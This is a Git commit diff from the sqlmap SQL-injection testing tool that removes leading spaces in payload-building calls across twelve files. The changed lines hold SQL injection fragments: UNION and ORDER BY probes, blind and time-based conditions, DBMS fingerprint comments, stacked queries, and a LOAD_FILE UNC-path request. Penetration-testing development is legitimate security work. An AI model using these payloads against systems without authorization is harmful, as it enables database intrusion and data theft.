sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor code adjustments

Browse Source
This commit is contained in:
Bernardo Damele 2010-10-25 14:11:47 +00:00
parent 24c5d7b313
commit 215175e3b7
12 changed files with 28 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/agent.py
View File

@ -446,7 +446,7 @@ class Agent:
@rtype: C{str}
"""
inbandQuery = self.prefixQuery(" UNION ALL SELECT ")
inbandQuery = self.prefixQuery("UNION ALL SELECT ")
if query.startswith("TOP"):
topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)

10
lib/request/inject.py
View File

@ -96,7 +96,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
advantage of an blind SQL injection vulnerability on the affected
parameter through a bisection algorithm.
"""
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference.query)
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
count = None
@ -394,12 +395,13 @@ def goStacked(expression, silent=False):
if conf.direct:
return direct(expression), None
debugMsg = "query: %s" % expression
logger.debug(debugMsg)
comment = queries[kb.dbms].comment.query
query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s;%s" % (query, comment))
debugMsg = "query: %s" % query
logger.debug(debugMsg)
payload = agent.payload(newValue=query)
page, _ = Request.queryPage(payload, content=True, silent=silent)

4
lib/techniques/blind/inference.py
View File

@ -441,7 +441,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if commonValue is not None:
# One-shot query containing equals commonValue
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
query = agent.postfixQuery(query)
queriesCount[0] += 1
result = Request.queryPage(urlencode(agent.payload(newValue=query)))
@ -465,7 +465,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Substring-query containing equals commonPattern
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.postfixQuery(query)
queriesCount[0] += 1
result = Request.queryPage(urlencode(agent.payload(newValue=query)))

2
lib/techniques/blind/timebased.py
View File

@ -24,7 +24,7 @@ def timeTest():
logger.info(infoMsg)
timeQuery = getDelayQuery(andCond=True)
query = agent.prefixQuery(" AND %s" % timeQuery)
query = agent.prefixQuery("AND %s" % timeQuery)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
start = time.time()

12
lib/techniques/error/use.py
View File

@ -35,12 +35,12 @@ def errorUse(expression):
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
output = None
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error.query)
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
startLimiter = ""
endLimiter = ""
@ -62,11 +62,13 @@ def errorUse(expression):
startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
debugMsg = "query: %s" % expressionUnescaped
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
debugMsg = "query: %s" % forgedQuery
logger.debug(debugMsg)
forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
result = Request.queryPage(urlencode(forgedPayload), content=True)
payload = agent.payload(newValue=forgedQuery)
result = Request.queryPage(urlencode(payload), content=True)
match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
if match:

4
lib/techniques/inband/union/test.py
View File

@ -136,7 +136,7 @@ def __unionTestByNULLBruteforce(comment):
"""
columns = None
query = agent.prefixQuery(" UNION ALL SELECT NULL")
query = agent.prefixQuery("UNION ALL SELECT NULL")
for count in range(0, 50):
if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
@ -164,7 +164,7 @@ def __unionTestByOrderBy(comment):
prevPayload = ""
for count in range(1, 51):
query = agent.prefixQuery(" ORDER BY %d" % count)
query = agent.prefixQuery("ORDER BY %d" % count)
orderByQuery = agent.postfixQuery(query, comment)
payload = agent.payload(newValue=orderByQuery)
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)

2
lib/techniques/inband/union/use.py
View File

@ -196,8 +196,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
query = agent.forgeInbandQuery(expression, nullChar=nullChar)
payload = agent.payload(newValue=query)
# NOTE: for debug purposes only
#debugMsg = "query: %s" % payload
debugMsg = "query: %s" % query
logger.debug(debugMsg)

4
plugins/dbms/access/fingerprint.py
View File

@ -37,7 +37,7 @@ class Fingerprint(GenericFingerprint):
elif kb.dbmsVersion[0] in ("2002-2003", "2007"):
table = "MSysAccessStorage"
if table:
query = agent.prefixQuery(" AND EXISTS(SELECT CURDIR() FROM %s)" % table)
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -67,7 +67,7 @@ class Fingerprint(GenericFingerprint):
negate = True
table = table[1:]
randInt = randomInt()
query = agent.prefixQuery(" AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

6
plugins/dbms/maxdb/fingerprint.py
View File

@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "executing SAP MaxDB SYSINFO version check"
logger.info(infoMsg)
query = agent.prefixQuery(" /* NoValue */")
query = agent.prefixQuery("/* NoValue */")
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint):
minor, major = None, None
for version in [6, 7]:
query = agent.prefixQuery(" AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -56,7 +56,7 @@ class Fingerprint(GenericFingerprint):
major = version
for version in xrange(0, 10):
query = agent.prefixQuery(" AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

4
plugins/dbms/mysql/fingerprint.py
View File

@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "executing MySQL comment injection fingerprint"
logger.info(infoMsg)
query = agent.prefixQuery(" /* NoValue */")
query = agent.prefixQuery("/* NoValue */")
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
for version in range(element[0], element[1] + 1):
randInt = randomInt()
version = getUnicode(version)
query = agent.prefixQuery(" /*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

2
plugins/dbms/mysql/takeover.py
View File

@ -101,7 +101,7 @@ class Takeover(GenericTakeover):
def uncPathRequest(self):
if not kb.stackedTest:
query = agent.prefixQuery(" AND LOAD_FILE('%s')" % self.uncPath)
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)

2
plugins/generic/enumeration.py
View File

@ -815,7 +815,7 @@ class Enumeration:
length = len(tables)
for table in tables:
query = agent.prefixQuery(" %s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
query = agent.postfixQuery(query)
result = Request.queryPage(urlencode(agent.payload(newValue=query)))